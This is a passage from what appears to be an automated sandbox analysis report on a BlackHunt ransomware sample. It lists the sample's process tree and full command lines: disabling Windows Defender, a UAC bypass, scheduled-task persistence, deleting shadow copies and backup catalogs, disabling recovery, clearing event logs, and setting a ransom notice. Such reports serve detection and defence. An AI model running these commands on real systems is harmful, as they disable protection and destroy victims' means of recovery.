2056 wrote to memory of 3588 2056 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe 118 PID 2056 wrote to memory of 3588 2056 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe 118 PID 2056 wrote to memory of 3088 2056 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe 120 PID 2056 wrote to memory of 3088 2056 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe 120 PID 2056 wrote to memory of 1596 2056 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe 129 PID 2056 wrote to memory of 1596 2056 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe 129 PID 4696 wrote to memory of 1368 4696 cmd.exe 128 PID 4696 wrote to memory of 1368 4696 cmd.exe 128 PID 4016 wrote to memory of 1668 4016 cmd.exe 127 PID 4016 wrote to memory of 1668 4016 cmd.exe 127 PID 2056 wrote to memory of 1948 2056 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe 126 PID 2056 wrote to memory of 1948 2056 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe 126 PID 2056 wrote to memory of 4452 2056 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe 121 PID 2056 wrote to memory of 4452 2056 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe 121 PID 2056 wrote to memory of 1048 2056 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe 125 PID 2056 wrote to memory of 1048 2056 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe 125 PID 2056 wrote to memory of 4348 2056 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe 131 PID 2056 wrote to memory of 4348 2056 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe 131 PID 3904 wrote to memory of 1724 3904 cmd.exe 133 PID 3904 wrote to memory of 1724 3904 cmd.exe 133 PID 2056 wrote to memory of 3988 2056 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe 139 PID 2056 wrote to memory of 3988 2056 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe 139 PID 2056 wrote to memory of 2176 2056 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe 135 PID 2056 wrote to memory of 2176 2056 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe 135 PID 2056 wrote to memory of 964 2056 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe 138 PID 2056 wrote to memory of 964 2056 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe 138 PID 3464 wrote to memory of 1496 3464 cmd.exe 140 PID 3464 wrote to memory of 1496 3464 cmd.exe 140 PID 2056 wrote to memory of 1708 2056 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe 144 PID 2056 wrote to memory of 1708 2056 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe 144 PID 2056 wrote to memory of 1916 2056 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe 142 PID 2056 wrote to memory of 1916 2056 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe 142 PID 2056 wrote to memory of 1068 2056 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe 147 PID 2056 wrote to memory of 1068 2056 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe 147 PID 2056 wrote to memory of 3460 2056 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe 151 PID 2056 wrote to memory of 3460 2056 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe 151 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe"C:\Users\Admin\AppData\Local\Temp\03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2056 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵PID:1348
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:4876
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4704 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:4036
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4016 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:1668
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵PID:968
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵PID:3904
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:1724
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4696 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:1368
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:1800
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:5040
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3464 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:1496
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:4780
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:1208
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:1460
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:764
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:4408
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:4268
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:3588
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:4512
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:3088
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:8
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:4452
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:1048
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:2740
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:1948
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:4784
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:1596
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:4952
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:4348
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:3096
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2176
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:4788
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:964
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:852
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:3988
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:4356
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1916
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:4268
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1708
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:2160
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:1068
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:1436
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:3460
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵
- Suspicious use of WriteProcessMemory
PID:1348
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:4616
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:3556
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1276
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:4952
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:2672
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:1796
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:3256
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:1448
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe" /F2⤵PID:2024
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:764
-
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe" /F3⤵
- Creates scheduled task(s)
PID:1272
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
PID:3904 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:4972
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:3684
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:852
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:3352
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2404
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:2004
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:5868
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:4988
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:6372
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:3044
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:7532
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵
- Suspicious use of WriteProcessMemory
PID:968 -
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:5540
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:3792
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:4804
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:4660
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:7456
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1436
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:7544
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:5976
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:12156
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:12112
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:2240
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:8576
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:12452
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:11852
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:9596
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:12272
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:8932
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:9620
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:6828
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:6292
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:12388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:1240
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:12168
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:12372
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:13160
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:12392
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:12800
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:12460
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:12632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:12324
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:12508
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:8240
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:4340
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:12036
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:8388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:4788
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:12584
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:12000
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:4480
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:7540
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:12556
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:11484
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:13104
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:7064
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:12748
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:8408
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7596
-
-
-
